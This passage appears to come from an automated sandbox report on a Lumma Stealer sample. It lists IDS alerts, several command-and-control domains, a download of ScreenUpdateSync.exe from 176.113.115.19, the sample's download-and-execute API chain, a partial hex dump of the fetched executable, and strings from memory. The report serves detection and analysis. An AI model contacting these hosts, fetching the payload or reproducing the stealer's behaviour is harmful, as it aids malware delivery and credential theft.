    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0218ECC9
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ebx, eax2_2_02165D17
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ebp, eax2_2_02165D17
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ecx, eax2_2_02176D15
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]2_2_02185D57
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_0218BD67
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0217AD91
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0217BD88
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0218EDC6

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2059039 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop) : 192.168.2.5:55144 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059051 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop) : 192.168.2.5:65028 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059037 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop) : 192.168.2.5:52066 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059041 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop) : 192.168.2.5:61207 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059035 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop) : 192.168.2.5:65437 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059057 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop) : 192.168.2.5:59972 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059049 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop) : 192.168.2.5:55763 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059043 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop) : 192.168.2.5:57954 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059088 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click) : 192.168.2.5:63165 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49706 -> 104.102.49.254:443
    Source: Malware configuration extractorURLs: soundtappysk.shop
    Source: Malware configuration extractorURLs: apporholis.shop
    Source: Malware configuration extractorURLs: handscreamny.shop
    Source: Malware configuration extractorURLs: chipdonkeruz.shop
    Source: Malware configuration extractorURLs: skidjazzyric.click
    Source: Malware configuration extractorURLs: femalsabler.shop
    Source: Malware configuration extractorURLs: crowdwarek.shop
    Source: Malware configuration extractorURLs: versersleep.shop
    Source: Malware configuration extractorURLs: robinsharez.shop
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 12 Jan 2025 16:52:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 12 Jan 2025 16:45:01 GMTETag: "62a00-62b850c908464"Accept-Ranges: bytesContent-Length: 403968Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ec be f9 b4 a8 df 97 e7 a8 df 97 e7 a8 df 97 e7 b6 8d 13 e7 89 df 97 e7 b6 8d 02 e7 bc df 97 e7 b6 8d 14 e7 c4 df 97 e7 8f 19 ec e7 ab df 97 e7 a8 df 96 e7 d9 df 97 e7 b6 8d 1d e7 a9 df 97 e7 b6 8d 03 e7 a9 df 97 e7 b6 8d 06 e7 a9 df 97 e7 52 69 63 68 a8 df 97 e7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 f9 fd 95 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 36 04 00 00 70 08 00 00 00 00 00 b7 14 00 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 0c 00 00 04 00 00 02 17 07 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 69 04 00 28 00 00 00 00 80 0b 00 10 69 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 04 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 34 04 00 00 10 00 00 00 36 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 56 22 00 00 00 50 04 00 00 24 00 00 00 3a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 7c 06 00 00 80 04 00 00 16 00 00 00 5e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 6f 73 75 00 00 00 e5 53 00 00 00 00 0b 00 00 48 00 00 00 74 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6d 75 77 61 76 00 00 5a 01 00 00 00 60 0b 00 00 02 00 00 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 6f 78 61 68 00 00 0c 00 00 00 00 70 0b 00 00 02 00 00 00 be 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 69 01 00 00 80 0b 00 00 6a 01 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: Joe Sandbox ViewIP Address: 172.67.179.207 172.67.179.207
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewIP Address: 176.113.115.19 176.113.115.19
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.102.49.254:443
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 176.113.115.19:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 172.67.179.207:443
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_004029EA InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029EA
    Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: iContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=cbc3a60c9f2906ff09a75258; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25665Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 12 Jan 2025 16:52:06 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Controlh equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: post-to-me.com
    Source: global trafficDNS traffic detected: DNS query: skidjazzyric.click
    Source: global trafficDNS traffic detected: DNS query: soundtappysk.shop
    Source: global trafficDNS traffic detected: DNS query: femalsabler.shop
    Source: global trafficDNS traffic detected: DNS query: apporholis.shop
    Source: global trafficDNS traffic detected: DNS query: crowdwarek.shop
    Source: global trafficDNS traffic detected: DNS query: versersleep.shop
    Source: global trafficDNS traffic detected: DNS query: chipdonkeruz.shop
    Source: global trafficDNS traffic detected: DNS query: handscreamny.shop
    Source: global trafficDNS traffic detected: DNS query: robinsharez.shop
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
    Source: L7GNkeVm5e.exe, L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539968169.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000003.4407439602.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
    Source: L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539968169.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000003.4407439602.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe(
    Source: L7GNkeVm5e.exe, 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE
    Source: EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
    Source: EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apporholis.shop:443/apiiP
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chipdonkeruz.shop:443/apih
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
    Source: EB86.tmp.exe, 00000002.00000002.2358880463.000000000064B000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168246436.0000000000648000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168282667.000000000064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/m
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
